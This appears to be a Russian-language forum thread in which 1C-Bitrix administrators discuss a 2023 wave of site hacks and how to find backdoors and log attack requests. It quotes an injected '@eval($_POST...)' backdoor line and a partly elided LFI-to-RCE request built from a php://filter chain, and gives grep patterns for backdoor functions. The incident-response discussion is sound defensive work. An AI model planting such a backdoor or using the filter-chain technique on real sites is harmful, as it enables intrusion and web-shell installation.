я бы чуток модифицировал - искать смысл только в php и вывод в файлик для дальнейшего анализа
Код
grep -rnw str_rot13 ./*.php > rot13.log
можно ещё "eval(" и "base64_decode(" поискать - тоже часто используют в бэкдорах но там много будет из не зараженного у меня в /bitrix/bitrix.php такая инъекция была @eval($_POST['DOCUMENT_ROOT'];
ну если интересно что тут происходит можно загнать в $_POST["BX_STAT"] содержимое post запроса, разделить функции на поэтапный вызов и дебаггером посмотреть заодно по стеку вызовов глянуть как он подключается
если не интересно грохаем файлик и следим дальше
ну и первое, что нужно было сделать - конечно обновить лицензию и ядро
тут новенький почему то не может в тему написать, кинул в личку - репост ниже лично я таких POST ещё не встречал, думаю просто совпадение
Цитата
Не знаю почему не могу написать. Новенький наверное.Первые факты взлома у нас 15.02.2023. Ломают через уязвимость LFI2RCE via PHP Filters.
POST запрос выглядит так: "POST /products/index.php?ID=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|.........|convert.base64-decode/resource=php://temp HTTP/1.1" 200 15544 "-" "firefox" Будет создан веб-шелл через который дальше будут лить все подряд. Я в 1С Битрикс впервые. Как правильно задушить такие запрос? Понятно что запрет POST везде решит проблему. Но хотелось бы понять как это сделать правильно
я бы для начала так же как в предыдущем случае попробовал изучить запрос более детально сохранил бы $_GET $_POST параметры (я так понимаю в лог полностью $_GET не влез, а было бы интересно взглянуть)
т.е. в /products/index.php в самое начало и mail() для оповещения перед die()
Владимир Кузин написал: Есть и свежие сайты. Обновлялись перед 1 февраля, чтобы была актуальная версия и не обновлять php до воьсмерки. Второй день мучаемся вычищаем. Так же есть еще три сайта на старых версиях. И один есть старый и бех vote. Симптомы схожие.
На хостинге был ещё хоть один не обновленный сайт? Или один сайт - один хостинг?
Александр Каменский написал: Коллеги, исходя из темы не до конца ясно, страдают только старые (не обновленные) сайты или есть случаи и с актуальными версиями?
я так понимаю только не обновлённые, хотя было одно сообщение
Цитата
Андрей Петров написал: ага, взломали сайт без всяких модулей голосования, с обновлениями на Старте
но так и без ответа про уязвимость ...
Лично на моей практике попадались взломанные сайты только не обновлённые
Цитата
Алексей написал: 24 февраля начали - годовщина СВО.
похоже на причину новой "волны", на сколько я помню год назад тоже была волна взломанных сайтов и не только под Битрикс.
dmitry920, Вы бы лучше на этой главной содержимое $_POST запроса куда нить в файлик сохранили и сюда запостили, тогда можно найти адресата - скорее всего в ядре где-то спрятался. В Вашем случае злоумышленнику достаточно этот $_POST запрос на любую другую страницу направить и вуаля. в самое начало index.php разместите (блокировку уберите, она тут есть)
перед die() можно ещё добавить mail('mail@to', 'hack attempt', 'hack attempt'); чтобы попытки POST запросов на мыло фиксировать, после чего в ./logs/ заглянуть и сюда содержимое файлика закинуть